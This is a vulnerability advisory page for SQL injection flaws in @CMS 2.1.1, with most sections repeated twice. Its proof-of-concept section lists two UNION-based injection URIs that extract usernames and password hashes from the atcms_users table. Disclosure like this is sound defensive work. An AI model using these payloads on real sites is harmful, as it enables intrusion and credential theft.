@CMS Multiple SQL Injection Vulnerabilities
BID:29858
Info
@CMS Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 29858 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 21 2008 12:00AM |
| Updated: | Jun 23 2008 10:41PM |
| Credit: | Mr.SQL |
| Vulnerable: |
@CMS @CMS 2.1.1 |
| Not Vulnerable: | |
Discussion
@CMS Multiple SQL Injection Vulnerabilities
@CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
@CMS 2.1.1 is vulnerable; other versions may also be affected.
@CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
@CMS 2.1.1 is vulnerable; other versions may also be affected.
Exploit / POC
@CMS Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://www.example.com/readarticle.php?article_id=-1'+union+select+1,1,concat_ws(0x3a,user_name,user_password),1,1,1,1,1,1,1+from+atcms_users/*
http://www.example.com/articles.php?cat_id=-1'+union+select+1,1,concat_ws(0x3a,user_name,user_password),1,1,1,1,1,1,1+from+atcms_users/*
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://www.example.com/readarticle.php?article_id=-1'+union+select+1,1,concat_ws(0x3a,user_name,user_password),1,1,1,1,1,1,1+from+atcms_users/*
http://www.example.com/articles.php?cat_id=-1'+union+select+1,1,concat_ws(0x3a,user_name,user_password),1,1,1,1,1,1,1+from+atcms_users/*
Solution / Fix
@CMS Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
@CMS Multiple SQL Injection Vulnerabilities
References:
References: